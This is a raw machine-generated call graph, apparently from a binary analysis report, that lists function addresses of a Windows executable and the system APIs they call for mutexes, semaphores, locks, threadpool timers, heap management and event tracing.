2601->2600 2602->2589 2603->2602 2605 7ff64d601da7 _vsnwprintf 2604->2605 2606 7ff64d601dc8 CreateMutexExW 2604->2606 2605->2606 2606->2565 2606->2566 2608 7ff64d6098ad 2607->2608 2609 7ff64d6098f1 OpenSemaphoreW 2608->2609 2610 7ff64d609940 2609->2610 2611 7ff64d609913 GetLastError 2609->2611 2692 7ff64d602ee0 WaitForSingleObject 2610->2692 2612 7ff64d609928 2611->2612 2615 7ff64d609a46 2611->2615 2707 7ff64d602b0c 2612->2707 2618 7ff64d60a080 7 API calls 2615->2618 2617 7ff64d609939 2617->2615 2627 7ff64d602ad4 13 API calls 2617->2627 2621 7ff64d608b52 2618->2621 2619 7ff64d60995d 2622 7ff64d602ad4 13 API calls 2619->2622 2620 7ff64d609985 2623 7ff64d609996 OpenSemaphoreW 2620->2623 2621->2577 2644 7ff64d602ad4 2621->2644 2624 7ff64d609978 2622->2624 2625 7ff64d6099c8 2623->2625 2626 7ff64d6099b3 2623->2626 2628 7ff64d602be4 20 API calls 2624->2628 2630 7ff64d602ee0 22 API calls 2625->2630 2629 7ff64d602b0c 14 API calls 2626->2629 2627->2615 2628->2617 2629->2624 2631 7ff64d6099d5 2630->2631 2632 7ff64d6099db 2631->2632 2633 7ff64d609a03 2631->2633 2634 7ff64d602ad4 13 API calls 2632->2634 2635 7ff64d602be4 20 API calls 2633->2635 2637 7ff64d6099f6 2634->2637 2636 7ff64d609a0b 2635->2636 2638 7ff64d602be4 20 API calls 2636->2638 2639 7ff64d602be4 20 API calls 2637->2639 2638->2617 2639->2624 2641 7ff64d602432 2640->2641 2642 7ff64d602461 2640->2642 2643 7ff64d602910 13 API calls 2641->2643 2642->2569 2643->2642 2645 7ff64d602910 13 API calls 2644->2645 2646 7ff64d602afd 2645->2646 2646->2577 2648 7ff64d602bfe 2647->2648 2649 7ff64d602bf8 2647->2649 2725 7ff64d602b2c 2648->2725 2649->2569 2653 7ff64d602c2e 2655 7ff64d602b2c 14 API calls 2653->2655 2654 7ff64d602c28 2654->2569 2656 7ff64d602c3d 2655->2656 2657 7ff64d602c82 2656->2657 2658 7ff64d602c5e GetLastError 2656->2658 2660 7ff64d602cb3 2657->2660 2661 7ff64d602c8f GetLastError 2657->2661 2659 7ff64d602be4 14 API calls 2658->2659 2662 7ff64d602c74 SetLastError 2659->2662 2660->2569 2663 7ff64d602be4 14 API calls 2661->2663 2662->2657 2664 7ff64d602ca5 SetLastError 2663->2664 2664->2660 2666 7ff64d602ed3 2665->2666 2667 7ff64d602d17 2665->2667 2668 7ff64d602d73 CreateSemaphoreExW 2667->2668 2669 7ff64d602de5 2668->2669 2670 7ff64d602db1 2668->2670 2672 7ff64d60241c 14 API calls 2669->2672 2671 7ff64d602db9 GetLastError 2670->2671 2675 7ff64d602ddd 2670->2675 2673 7ff64d602be4 20 API calls 2671->2673 2672->2675 2674 7ff64d602dcf SetLastError 2673->2674 2674->2675 2677 7ff64d602e24 CreateSemaphoreExW 2675->2677 2682 7ff64d602df0 2675->2682 2676 7ff64d602ad4 13 API calls 2678 7ff64d602e0c 2676->2678 2679 7ff64d602e8f 2677->2679 2680 7ff64d602e59 2677->2680 2685 7ff64d60a080 7 API calls 2678->2685 2683 7ff64d60241c 14 API calls 2679->2683 2681 7ff64d602e62 GetLastError 2680->2681 2680->2682 2684 7ff64d602be4 20 API calls 2681->2684 2682->2676 2682->2678 2683->2682 2686 7ff64d602e78 SetLastError 2684->2686 2687 7ff64d602eb6 2685->2687 2686->2682 2687->2594 2687->2595 2688->2598 2690 7ff64d602910 13 API calls 2689->2690 2691 7ff64d602b84 2690->2691 2693 7ff64d602f03 2692->2693 2694 7ff64d602f17 2692->2694 2695 7ff64d602b0c 14 API calls 2693->2695 2696 7ff64d602f22 2694->2696 2697 7ff64d602f3d ReleaseSemaphore 2694->2697 2698 7ff64d602f98 ReleaseSemaphore 2694->2698 2705 7ff64d602f12 2695->2705 2701 7ff64d602ad4 13 API calls 2696->2701 2696->2705 2697->2693 2699 7ff64d602f59 ReleaseSemaphore 2697->2699 2698->2693 2700 7ff64d602fbc 2698->2700 2699->2696 2702 7ff64d602f77 GetLastError 2699->2702 2700->2696 2703 7ff64d602fca ReleaseSemaphore 2700->2703 2701->2705 2702->2696 2702->2705 2703->2696 2704 7ff64d602fe4 GetLastError 2703->2704 2704->2696 2706 7ff64d602ff7 WaitForSingleObject 2704->2706 2705->2619 2705->2620 2706->2696 2710 7ff64d602a18 GetLastError 2707->2710 2711 7ff64d602a49 2710->2711 2714 7ff64d602a78 2710->2714 2716 7ff64d602910 2711->2716 2719 7ff64d602804 2714->2719 2717 7ff64d602804 13 API calls 2716->2717 2718 7ff64d602949 2717->2718 2718->2714 2720 7ff64d602811 2719->2720 2721 7ff64d6024a4 13 API calls 2720->2721 2722 7ff64d60289c 2721->2722 2723 7ff64d60a080 7 API calls 2722->2723 2724 7ff64d6028b5 2723->2724 2724->2617 2728 7ff64d602958 GetLastError 2725->2728 2729 7ff64d60298b 2728->2729 2732 7ff64d6029ba 2728->2732 2730 7ff64d602910 13 API calls 2729->2730 2730->2732 2731 7ff64d602804 13 API calls 2733 7ff64d6029f8 ReleaseMutex 2731->2733 2732->2731 2733->2653 2733->2654 2735 7ff64d604ad2 2734->2735 2736 7ff64d604aec memcpy_s 2734->2736 2740 7ff64d604994 2735->2740 2738 7ff64d604b19 2736->2738 2738->2561 2741 7ff64d6049c3 GetProcessHeap HeapAlloc 2740->2741 2745 7ff64d604a1c 2740->2745 2742 7ff64d6049f8 GetProcessHeap 2741->2742 2743 7ff64d604a17 2741->2743 2742->2743 2744 7ff64d604a20 memcpy_s 2743->2744 2743->2745 2744->2745 2746 7ff64d604a4c GetProcessHeap HeapFree 2744->2746 2745->2736 2745->2738 2746->2745 2750 7ff64d607d88 2749->2750 2751 7ff64d607e24 2749->2751 2750->2751 2752 7ff64d607d94 AcquireSRWLockExclusive 2750->2752 2751->2502 2757 7ff64d607e44 2751->2757 2754 7ff64d607dcc 2752->2754 2755 7ff64d607db1 ReleaseSRWLockExclusive 2752->2755 2754->2755 2756 7ff64d607e18 ReleaseSRWLockExclusive 2754->2756 2755->2751 2756->2751 2758 7ff64d607e64 AcquireSRWLockExclusive 2757->2758 2759 7ff64d607ecd 2757->2759 2760 7ff64d607e81 2758->2760 2761 7ff64d607ea5 ReleaseSRWLockExclusive 2758->2761 2759->2502 2760->2761 2763 7ff64d604aa4 7 API calls 2760->2763 2761->2759 2763->2761 2955 7ff64d60a320 2956 7ff64d60a352 2955->2956 2958 7ff64d60a32f 2955->2958 2957 7ff64d60a34b ?terminate@ 2957->2956 2958->2956 2958->2957 3237 7ff64d60a360 SetUnhandledExceptionFilter 3238 7ff64d6081e0 3261 7ff64d6080e4 InitOnceBeginInitialize 3238->3261 3241 7ff64d60a080 7 API calls 3244 7ff64d6086d6 3241->3244 3242 7ff64d60824a 3245 7ff64d6080e4 11 API calls 3242->3245 3243 7ff64d6083d3 3246 7ff64d60852d 3243->3246 3247 7ff64d6083e3 3243->3247 3252 7ff64d60824f 3245->3252 3250 7ff64d6080e4 11 API calls 3246->3250 3259 7ff64d6083ce 3246->3259 3248 7ff64d6080e4 11 API calls 3247->3248 3253 7ff64d6083e8 3248->3253 3249 7ff64d608316 3251 7ff64d6080e4 11 API calls 3249->3251 3249->3259 3257 7ff64d60853b 3250->3257 3254 7ff64d60832d 3251->3254 3252->3249 3265 7ff64d6016f0 3252->3265 3253->3259 3270 7ff64d601090 EventWriteTransfer 3253->3270 3255 7ff64d6016f0 8 API calls 3254->3255 3254->3259 3255->3259 3257->3259 3271 7ff64d6017b8 3257->3271 3259->3241 3262 7ff64d608165 3261->3262 3263 7ff64d608116 3261->3263 3262->3242 3262->3243 3262->3259 3263->3262 3277 7ff64d608974 3263->3277 3284 7ff64d601090 EventWriteTransfer 3265->3284 3267 7ff64d601799 3268 7ff64d60a080 7 API calls 3267->3268 3269 7ff64d6017a5 3268->3269 3269->3249 3270->3259 3272 7ff64d601813 3271->3272 3285 7ff64d601090 EventWriteTransfer 3272->3285 3274 7ff64d601a70 3275 7ff64d60a080 7 API calls 3274->3275 3276 7ff64d601a7c 3275->3276 3276->3259 3278 7ff64d608a26 InitOnceComplete 3277->3278 3279 7ff64d6089a6 EventRegister 3277->3279 3280 7ff64d60a080 7 API calls 3278->3280 3281 7ff64d608a0a 3279->3281 3282 7ff64d6089ef EventSetInformation 3279->3282 3283 7ff64d608a46 3280->3283 3281->3278 3282->3281 3283->3262 3284->3267 3285->3274 3286 7ff64d602768 3287 7ff64d602786 memset 3286->3287 3288 7ff64d6027d0 3287->3288 3289 7ff64d6075c0 3290 7ff64d6075ee 3289->3290 3291 7ff64d60764c 3289->3291 3290->3291 3300 7ff64d6075f7 3290->3300 3292 7ff64d607652 3291->3292 3293 7ff64d60766c 3291->3293 3313 7ff64d606f80 3292->3313 3295 7ff64d60775d 3293->3295 3297 7ff64d607681 3293->3297 3350 7ff64d606c00 3295->3350 3296 7ff64d607647 3299 7ff64d60a080 7 API calls 3296->3299 3302 7ff64d6076ee 3297->3302 3303 7ff64d6076b2 GetModuleHandleW 3297->3303 3304 7ff64d6076cc GetProcAddress 3297->3304 3301 7ff64d607781 3299->3301 3300->3296 3305 7ff64d6070e8 52 API calls 3300->3305 3302->3296 3329 7ff64d604030 memset 3302->3329 3303->3304 3304->3302 3306 7ff64d60762c 3305->3306 3306->3296 3307 7ff64d606714 6 API calls 3306->3307 3307->3296 3312 7ff64d607739 GetProcessHeap HeapFree 3312->3296 3314 7ff64d6070c4 3313->3314 3317 7ff64d606fb4 3313->3317 3315 7ff64d60a080 7 API calls 3314->3315 3316 7ff64d6070d1 3315->3316 3316->3296 3317->3314 3318 7ff64d606fe3 AcquireSRWLockExclusive 3317->3318 3319 7ff64d604aa4 7 API calls 3318->3319 3320 7ff64d607021 3319->3320 3321 7ff64d6070b0 3320->3321 3323 7ff64d607034 CreateThreadpoolTimer 3320->3323 3324 7ff64d607086 SetThreadpoolTimer 3320->3324 3321->3314 3322 7ff64d6070b5 ReleaseSRWLockExclusive 3321->3322 3322->3314 3325 7ff64d60707d 3323->3325 3326 7ff64d607059 GetLastError 3323->3326 3324->3321 3325->3321 3325->3324 3371 7ff64d6096c8 SetThreadpoolTimer WaitForThreadpoolTimerCallbacks CloseThreadpoolTimer 3326->3371 3330 7ff64d6039c4 2 API calls 3329->3330 3336 7ff64d6040d0 3330->3336 3331 7ff64d60418b 3334 7ff64d6042ec 3331->3334 3340 7ff64d60419d 3331->3340 3332 7ff64d604129 GetProcessHeap HeapAlloc 3332->3336 3342 7ff64d604232 3332->3342 3333 7ff64d604109 GetProcessHeap HeapFree 3333->3332 3335 7ff64d6042f1 GetProcessHeap HeapFree 3334->3335 3334->3342 3335->3342 3336->3331 3336->3332 3336->3333 3337 7ff64d6039c4 2 API calls 3336->3337 3337->3336 3338 7ff64d60a080 7 API calls 3339 7ff64d604320 3338->3339 3339->3296 3343 7ff64d6044fc 3339->3343 3341 7ff64d6039c4 2 API calls 3340->3341 3340->3342 3341->3342 3342->3338 3349 7ff64d604525 3343->3349 3344 7ff64d60466c 3345 7ff64d60a080 7 API calls 3344->3345 3346 7ff64d60467e 3345->3346 3346->3296 3346->3312 3347 7ff64d6039c4 2 API calls 3347->3349 3348 7ff64d603a6c 2 API calls 3348->3349 3349->3344 3349->3347 3349->3348 3351 7ff64d606d2e 3350->3351 3352 7ff64d606c2d 3350->3352 3351->3296 3353 7ff64d6070e8 52 API calls 3352->3353 3354 7ff64d606c32 3353->3354 3354->3351 3355 7ff64d606ccf 3354->3355 3356 7ff64d606c4a 3354->3356 3358 7ff64d606ab0 30 API calls 3355->3358 3356->3351 3357 7ff64d606c6a AcquireSRWLockExclusive 3356->3357 3359 7ff64d606c7e 3357->3359 3360 7ff64d606cd7 3358->3360 3361 7ff64d606ca8 3359->3361 3362 7ff64d606c93 3359->3362 3360->3351 3366 7ff64d606cff AcquireSRWLockExclusive 3360->3366 3375 7ff64d608818 3361->3375 3372 7ff64d6087e0 3362->3372 3365 7ff64d606ca4 3365->3360 3367 7ff64d606cbe ReleaseSRWLockExclusive 3365->3367 3368 7ff64d607198 7 API calls 3366->3368 3367->3360 3369 7ff64d606d1a 3368->3369 3369->3351 3370 7ff64d606d1f ReleaseSRWLockExclusive 3369->3370 3370->3351 3373 7ff64d6055c8 26 API calls 3372->3373 3374 7ff64d608809 3373->3374 3374->3365 3376 7ff64d6055c8 26 API calls 3375->3376 3377 7ff64d608844 3376->3377 3377->3365 3378 7ff64d6078c0 3380 7ff64d6078ce 3378->3380 3379 7ff64d60790c 3380->3379 3381 7ff64d606674 4 API calls 3380->3381 3381->3379 2963 7ff64d609a90 2964 7ff64d609adb 2963->2964 2965 7ff64d609aa2 AcquireSRWLockExclusive 2963->2965 2966 7ff64d609acd 2965->2966 2967 7ff64d609abe ReleaseSRWLockExclusive 2965->2967 2966->2964 2969 7ff64d606ab0 2966->2969 2967->2966 2983 7ff64d60640c 2969->2983 2971 7ff64d606ac6 AcquireSRWLockExclusive 2972 7ff64d606adb 2971->2972 2973 7ff64d606ae9 2971->2973 2984 7ff64d6053a4 2972->2984 2975 7ff64d6053a4 4 API calls 2973->2975 2977 7ff64d606b00 2973->2977 2975->2977 2976 7ff64d606b1d ReleaseSRWLockExclusive 2989 7ff64d6064cc 2976->2989 2977->2976 2978 7ff64d6053a4 4 API calls 2977->2978 2978->2976 2983->2971 2985 7ff64d605421 2984->2985 2986 7ff64d605401 GetProcessHeap HeapFree 2984->2986 2987 7ff64d605462 2985->2987 2988 7ff64d605442 GetProcessHeap HeapFree 2985->2988 2986->2985 2987->2973 2988->2987 2990 7ff64d606522 2989->2990 2991 7ff64d6064f0 2989->2991 2993 7ff64d60655b 2990->2993 2994 7ff64d606064 18 API calls 2990->2994 3006 7ff64d606064 2991->3006 2995 7ff64d6065bb 2993->2995 2996 7ff64d606064 18 API calls 2993->2996 2994->2993 2997 7ff64d60a080 7 API calls 2995->2997 2996->2995 2998 7ff64d6065c7 2997->2998 2999 7ff64d606b50 2998->2999 3000 7ff64d606b91 2999->3000 3001 7ff64d606b71 GetProcessHeap HeapFree 2999->3001 3002 7ff64d606bbf 3000->3002 3003 7ff64d606b9f GetProcessHeap HeapFree 3000->3003 3001->3000 3004 7ff64d606b40 3002->3004 3005 7ff64d606bcd GetProcessHeap HeapFree 3002->3005 3003->3002 3004->2964 3005->3004 3015 7ff64d606086 3006->3015 3008 7ff64d6063a7 3009 7ff64d6063d4 3008->3009 3010 7ff64d6063b4 GetProcessHeap HeapFree 3008->3010 3012 7ff64d60a080 7 API calls 3009->3012 3010->3009 3011 7ff64d6052a4 memcpy_s memcpy_s memcpy_s 3011->3015 3013 7ff64d6063e3 3012->3013 3013->2990 3014 7ff64d603a6c GetModuleHandleW GetProcAddress 3014->3015 3015->3008 3015->3009 3015->3011 3015->3014 3016 7ff64d6063ff 3015->3016 3017 7ff64d60636b GetProcessHeap HeapFree 3015->3017 3018 7ff64d6039c4 3015->3018 3017->3015 3019 7ff64d603a2b 3018->3019 3020 7ff64d6039e0 3018->3020 3019->3015 3021 7ff64d6039ec GetModuleHandleW 3020->3021 3022 7ff64d603a06 GetProcAddress 3020->3022 3021->3022 3022->3019 3023 7ff64d609d90 __wgetmainargs 3024 7ff64d60a810 3025 7ff64d60a820 3024->3025 3026 7ff64d60a825 3024->3026 3028 7ff64d60927c 3025->3028 3029 7ff64d6092a9 3028->3029 3033 7ff64d6093d9 3028->3033 3030 7ff64d6092c6 WaitForSingleObjectEx 3029->3030 3029->3033 3031 7ff64d6092e6 3030->3031 3035 7ff64d6092f5 3030->3035 3032 7ff64d60940e 3031->3032 3031->3035 3034 7ff64d602b4c 13 API calls 3032->3034 3033->3026 3036 7ff64d609418 3034->3036 3035->3033 3039 7ff64d609319 GetLastError 3035->3039 3049 7ff64d60933d 3035->3049 3037 7ff64d60943e GetLastError 3036->3037 3038 7ff64d609462 3036->3038 3067 7ff64d6096c8 SetThreadpoolTimer WaitForThreadpoolTimerCallbacks CloseThreadpoolTimer 3037->3067 3068 7ff64d607b2c 3038->3068 3040 7ff64d602c14 3039->3040 3043 7ff64d60932f SetLastError 3040->3043 3043->3049 3045 7ff64d60938f 3051 7ff64d602be4 20 API calls 3045->3051 3052 7ff64d60939d 3045->3052 3047 7ff64d6094a0 3050 7ff64d6094ae GetProcessHeap HeapFree 3047->3050 3059 7ff64d6094ce 3047->3059 3048 7ff64d609480 GetProcessHeap HeapFree 3048->3047 3049->3045 3062 7ff64d603314 3049->3062 3050->3059 3051->3052 3053 7ff64d6093ab 3052->3053 3056 7ff64d602be4 20 API calls 3052->3056 3054 7ff64d6093b9 GetProcessHeap HeapFree 3053->3054 3057 7ff64d602be4 20 API calls 3053->3057 3054->3033 3056->3053 3057->3054 3058 7ff64d60935e GetProcessHeap HeapFree 3058->3049 3060 7ff64d6094f8 3059->3060 3072 7ff64d6096c8 SetThreadpoolTimer WaitForThreadpoolTimerCallbacks CloseThreadpoolTimer 3059->3072 3060->3026 3063 7ff64d603345 3062->3063 3064 7ff64d603381 GetProcessHeap HeapFree 3062->3064 3065 7ff64d603349 GetProcessHeap HeapFree 3063->3065 3064->3058 3065->3065 3066 7ff64d60337d 3065->3066 3066->3064 3071 7ff64d607b74 3068->3071 3069 7ff64d60a080 7 API calls 3070 7ff64d607d4e 3069->3070 3070->3047 3070->3048 3071->3069 3382 7ff64d60a050 3385 7ff64d60a534 3382->3385 3386 7ff64d60a560 6 API calls 3385->3386 3387 7ff64d60a059 3385->3387 3386->3387 3388 7ff64d609bd0 3389 7ff64d609be8 ??3@YAXPEAX 3388->3389 3390 7ff64d609bf4 3388->3390 3389->3390 3073 7ff64d60a793 _XcptFilter 3074 7ff64d609514 3075 7ff64d609556 3074->3075 3076 7ff64d609532 GetLastError 3074->3076 3078 7ff64d609588 3075->3078 3079 7ff64d609564 GetLastError 3075->3079 3104 7ff64d6096c8 SetThreadpoolTimer WaitForThreadpoolTimerCallbacks CloseThreadpoolTimer 3076->3104 3082 7ff64d6095c1 3078->3082 3083 7ff64d6095a1 GetProcessHeap HeapFree 3078->3083 3105 7ff64d6096c8 SetThreadpoolTimer WaitForThreadpoolTimerCallbacks CloseThreadpoolTimer 3079->3105 3084 7ff64d6095f6 DeleteCriticalSection 3082->3084 3085 7ff64d6095d6 GetProcessHeap HeapFree 3082->3085 3083->3082 3087 7ff64d609639 DeleteCriticalSection 3084->3087 3088 7ff64d609619 GetProcessHeap HeapFree 3084->3088 3085->3084 3089 7ff64d609657 3087->3089 3090 7ff64d609652 3087->3090 3088->3087 3092 7ff64d609665 3089->3092 3110 7ff64d605134 3089->3110 3106 7ff64d607428 3090->3106 3094 7ff64d609673 3092->3094 3115 7ff64d6050c0 3092->3115 3096 7ff64d609681 3094->3096 3098 7ff64d6050c0 2 API calls 3094->3098 3097 7ff64d60968f 3096->3097 3120 7ff64d6096c8 SetThreadpoolTimer WaitForThreadpoolTimerCallbacks CloseThreadpoolTimer 3096->3120 3100 7ff64d60969d 3097->3100 3121 7ff64d6096c8 SetThreadpoolTimer WaitForThreadpoolTimerCallbacks CloseThreadpoolTimer 3097->3121 3098->3096 3102 7ff64d6096ab 3100->3102 3122 7ff64d608d9c 3100->3122 3107 7ff64d607434 3106->3107 3108 7ff64d60744c 3106->3108 3107->3108 3153 7ff64d606674 3107->3153 3108->3089 3111 7ff64d605149 3110->3111 3114 7ff64d605191 3110->3114 3112 7ff64d605155 GetModuleHandleW 3111->3112 3113 7ff64d60516f GetProcAddress 3111->3113 3112->3113 3113->3114 3114->3092 3116 7ff64d6050d5 3115->3116 3117 7ff64d60511d 3115->3117 3118 7ff64d6050e1 GetModuleHandleW 3116->3118 3119 7ff64d6050fb GetProcAddress 3116->3119 3117->3094 3118->3119 3119->3117 3123 7ff64d608dc4 3122->3123 3126 7ff64d608ebc 3122->3126 3125 7ff64d608de1 WaitForSingleObjectEx 3123->3125 3123->3126 3124 7ff64d608ead 3124->3102 3127 7ff64d608e01 3125->3127 3135 7ff64d608e10 3125->3135 3126->3124 3128 7ff64d608ee3 3126->3128 3129 7ff64d6053a4 4 API calls 3126->3129 3131 7ff64d608f46 3127->3131 3127->3135 3130 7ff64d608efa 3128->3130 3133 7ff64d6053a4 4 API calls 3128->3133 3129->3128 3134 7ff64d608f17 3130->3134 3137 7ff64d6053a4 4 API calls 3130->3137 3132 7ff64d602b4c 13 API calls 3131->3132 3136 7ff64d608f53 3132->3136 3133->3130 3138 7ff64d6064cc 18 API calls 3134->3138 3135->3124 3139 7ff64d608e58 3135->3139 3140 7ff64d608e34 GetLastError 3135->3140 3137->3134 3141 7ff64d608f21 3138->3141 3160 7ff64d606838 3139->3160 3143 7ff64d602c14 3140->3143 3144 7ff64d606b50 6 API calls 3141->3144 3146 7ff64d608e4a SetLastError 3143->3146 3144->3124 3146->3139 3154 7ff64d60667d EnterCriticalSection AcquireSRWLockExclusive 3153->3154 3155 7ff64d6066fb 3153->3155 3156 7ff64d6066c8 3154->3156 3155->3108 3157 7ff64d6066d8 ReleaseSRWLockExclusive 3156->3157 3158 7ff64d6066e7 3156->3158 3157->3158 3158->3155 3159 7ff64d6066ec LeaveCriticalSection 3158->3159 3159->3155 3161 7ff64d606857 3160->3161 3162 7ff64d60686b 3161->3162 3163 7ff64d6053a4 4 API calls 3161->3163 3164 7ff64d606882 3162->3164 3165 7ff64d6053a4 4 API calls 3162->3165 3163->3162 3166 7ff64d60689f 3164->3166 3167 7ff64d6053a4 4 API calls 3164->3167 3165->3164 3168 7ff64d6064cc 18 API calls 3166->3168 3167->3166 3169 7ff64d6068a9 3168->3169 3170 7ff64d606b50 6 API calls 3169->3170 3171 7ff64d6068b3 3170->3171 3172 7ff64d6068e7 DeleteCriticalSection 3171->3172 3173 7ff64d6068c7 GetProcessHeap HeapFree 3171->3173 3173->3172 3391 7ff64d60a7b7 _unlock 3174 7ff64d609ff9 3175 7ff64d60a008 _exit 3174->3175 3176 7ff64d60a011 3174->3176 3175->3176 3177 7ff64d60a026 3176->3177 3178 7ff64d60a01a _cexit 3176->3178 3178->3177 3179 7ff64d601b90 InitializeCriticalSectionEx InitializeCriticalSectionEx 3180 7ff64d60a2ec 3179->3180 3181 7ff64d602b90 3182 7ff64d602910 13 API calls 3181->3182 3183 7ff64d602bc8 3182->3183 3184 7ff64d608090 3185 7ff64d60809d AcquireSRWLockExclusive 3184->3185 3186 7ff64d6080d6 3184->3186 3187 7ff64d607b2c 7 API calls 3185->3187 3188 7ff64d6080bc ReleaseSRWLockExclusive 3187->3188 3188->3186 3392 7ff64d602350 GetModuleHandleW GetProcAddress 3393 7ff64d602396 3392->3393 3394 7ff64d606d50 3395 7ff64d606d81 AcquireSRWLockExclusive 3394->3395 3396 7ff64d606e60 3394->3396 3397 7ff64d606d9e 3395->3397 3398 7ff64d606df6 3395->3398 3397->3398 3400 7ff64d606dd4 GetProcAddress 3397->3400 3401 7ff64d606dba GetModuleHandleW 3397->3401 3408 7ff64d607260 3398->3408 3400->3398 3401->3400 3403 7ff64d606e4c 3403->3396 3404 7ff64d606e51 ReleaseSRWLockExclusive 3403->3404 3404->3396 3405 7ff64d607260 15 API calls 3406 7ff64d606e36 3405->3406 3406->3403 3407 7ff64d6065dc 7 API calls 3406->3407 3407->3403 3409 7ff64d607291 3408->3409 3420 7ff64d607342 3408->3420 3410 7ff64d6039c4 2 API calls 3409->3410 3412 7ff64d6072b5 3410->3412 3411 7ff64d60a080 7 API calls 3413 7ff64d606e1f 3411->3413 3414 7ff64d6072e1 3412->3414 3415 7ff64d6072bd GetLastError 3412->3415 3413->3403 3413->3405 3417 7ff64d607320 GetProcAddress 3414->3417 3418 7ff64d607306 GetModuleHandleW 3414->3418 3414->3420 3416 7ff64d6050c0 2 API calls 3415->3416 3419 7ff64d6072d3 SetLastError 3416->3419 3417->3420 3418->3417 3419->3414 3420->3411 3421 7ff64d607550 3424 7ff64d607458 3421->3424 3425 7ff64d6074c1 3424->3425 3426 7ff64d607497 3424->3426 3427 7ff64d607d74 3 API calls 3425->3427 3428 7ff64d60749b 3426->3428 3434 7ff64d60480c 3426->3434 3429 7ff64d6074ce 3427->3429 3431 7ff64d60480c 20 API calls 3429->3431 3432 7ff64d6074f5 3431->3432 3432->3428 3433 7ff64d607e44 9 API calls 3432->3433 3433->3428 3435 7ff64d60484b 3434->3435 3436 7ff64d604882 GetModuleHandleW 3435->3436 3437 7ff64d60489c GetProcAddress 3435->3437 3438 7ff64d6048be 3435->3438 3436->3437 3437->3438 3439 7ff64d60496b 3438->3439 3443 7ff64d6046a8 3438->3443 3441 7ff64d60a080 7 API calls 3439->3441 3442 7ff64d60497c 3441->3442 3442->3428 3444 7ff64d604030 16 API calls 3443->3444 3449 7ff64d6046f8 3444->3449 3445 7ff64d6047d8 3446 7ff64d60a080 7 API calls 3445->3446 3447 7ff64d6047eb 3446->3447 3447->3439 3448 7ff64d6047b6 GetProcessHeap HeapFree 3448->3445 3449->3445 3449->3448 3450 7ff64d6036d0 3451 7ff64d603704 GetCurrentThreadId 3450->3451 3453 7ff64d603737 3450->3453 3451->3453 3460 7ff64d60376a GetCurrentThreadId 3453->3460 3461 7ff64d6035c0 3453->3461 3454 7ff64d6037f3 3455 7ff64d6037c2 3455->3454 3465 7ff64d603524 3455->3465 3460->3454 3460->3455 3462 7ff64d6035ef 3461->3462 3463 7ff64d6036a4 3461->3463 3462->3463 3464 7ff64d60367a memcpy_s 3462->3464 3463->3460 3464->3463 3466 7ff64d60358d 3465->3466 3468 7ff64d603545 3465->3468 3466->3454 3471 7ff64d6033c4 3466->3471 3467 7ff64d60355b 3467->3466 3516 7ff64d608850 GetCurrentThreadId 3467->3516 3468->3467 3478 7ff64d608f5c GetCurrentProcessId 3468->3478 3472 7ff64d603400 3471->3472 3477 7ff64d603456 3471->3477 3473 7ff64d603404 GetProcessHeap HeapAlloc 3472->3473 3472->3477 3474 7ff64d603437 GetProcessHeap 3473->3474 3473->3477 3474->3477 3475 7ff64d6034fb 3475->3454 3477->3475 3521 7ff64d603060 3477->3521 3479 7ff64d601d78 _vsnwprintf 3478->3479 3480 7ff64d608fca CreateMutexExW 3479->3480 3481 7ff64d608ffa WaitForSingleObjectEx 3480->3481 3482 7ff64d608fee 3480->3482 3485 7ff64d609016 3481->3485 3483 7ff64d60241c 14 API calls 3482->3483 3484 7ff64d608ff3 3483->3484 3488 7ff64d60a080 7 API calls 3484->3488 3486 7ff64d609261 3485->3486 3487 7ff64d60985c 32 API calls 3485->3487 3489 7ff64d602b4c 13 API calls 3486->3489 3490 7ff64d60904a 3487->3490 3491 7ff64d6090c5 3488->3491 3492 7ff64d609273 3489->3492 3493 7ff64d60906c 3490->3493 3494 7ff64d602ad4 13 API calls 3490->3494 3491->3467 3495 7ff64d60907d 3493->3495 3496 7ff64d6090e2 GetProcessHeap HeapAlloc 3493->3496 3505 7ff64d60908c 3493->3505 3494->3493 3497 7ff64d602ad4 13 API calls 3495->3497 3495->3505 3498 7ff64d609136 3496->3498 3499 7ff64d609117 GetProcessHeap 3496->3499 3497->3505 3500 7ff64d609140 3498->3500 3501 7ff64d609161 3498->3501 3499->3498 3502 7ff64d602ad4 13 API calls 3500->3502 3501->3486 3503 7ff64d609174 3501->3503 3502->3495 3504 7ff64d602cd0 27 API calls 3503->3504 3506 7ff64d60918a 3504->3506 3505->3484 3507 7ff64d602be4 20 API calls 3505->3507 3508 7ff64d6091e7 memset memset 3506->3508 3509 7ff64d609190 3506->3509 3507->3484 3508->3495 3510 7ff64d602ad4 13 API calls 3509->3510 3511 7ff64d6091a7 3510->3511 3512 7ff64d6091b6 3511->3512 3513 7ff64d602be4 20 API calls 3511->3513 3514 7ff64d6091c5 GetProcessHeap HeapFree 3512->3514 3515 7ff64d602be4 20 API calls 3512->3515 3513->3512 3514->3495 3515->3514 3517 7ff64d6088a2 3516->3517 3518 7ff64d6088bb GetProcessHeap HeapAlloc 3517->3518 3520 7ff64d608907 3517->3520 3519 7ff64d6088e8 GetProcessHeap 3518->3519 3518->3520 3519->3520 3520->3466 3520->3520 3522 7ff64d6030d5 3521->3522 3523 7ff64d603141 GetProcessHeap HeapAlloc 3522->3523 3526 7ff64d6031c6 3522->3526 3524 7ff64d603192 3523->3524 3525 7ff64d603173 GetProcessHeap 3523->3525 3524->3526 3527 7ff64d60319a GetProcessHeap HeapFree 3524->3527 3525->3524 3528 7ff64d6032ed 3526->3528 3529 7ff64d60321c 3526->3529 3531 7ff64d603202 memcpy_s 3526->3531 3527->3526 3528->3475 3529->3529 3532 7ff64d603259 memcpy_s 3529->3532 3534 7ff64d603273 3529->3534 3531->3529 3532->3534 3533 7ff64d6032b6 memcpy_s 3535 7ff64d6032cd memset 3533->3535 3534->3533 3534->3535 3535->3528 3536 7ff64d6073d0 3537 7ff64d6073d9 3536->3537 3538 7ff64d6073e6 3536->3538 3539 7ff64d606714 6 API calls 3537->3539 3539->3538 3189 7ff64d608180 InitOnceBeginInitialize 3190 7ff64d6081aa 3189->3190 3540 7ff64d609c40 3541 7ff64d609c59 3540->3541 3542 7ff64d609c85 3540->3542 3543 7ff64d6055c8 26 API calls 3541->3543 3543->3542 3544 7ff64d60a840 3545 7ff64d60a856 3544->3545 3546 7ff64d60a85b GetProcessHeap HeapFree 3545->3546 3547 7ff64d60a89a 3545->3547 3546->3545 3548 7ff64d60a8c0 3549 7ff64d60a8cd 3548->3549 3550 7ff64d60a90e 3549->3550 3551 7ff64d608d9c 49 API calls 3549->3551 3551->3550 3191 7ff64d607a88 3192 7ff64d607a9a AcquireSRWLockExclusive 3191->3192 3193 7ff64d607b09 3191->3193 3194 